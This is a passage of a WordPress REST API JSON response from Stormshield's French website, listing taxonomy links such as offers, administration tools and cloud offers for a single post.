y":"offer","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/offer?post=244964"},{"taxonomy":"administration_tools","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/administration_tools?post=244964"},{"taxonomy":"cloud_offers","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/cloud_offers?post=244964"},{"taxonomy":"listing_product","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/listing_product?post=244964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}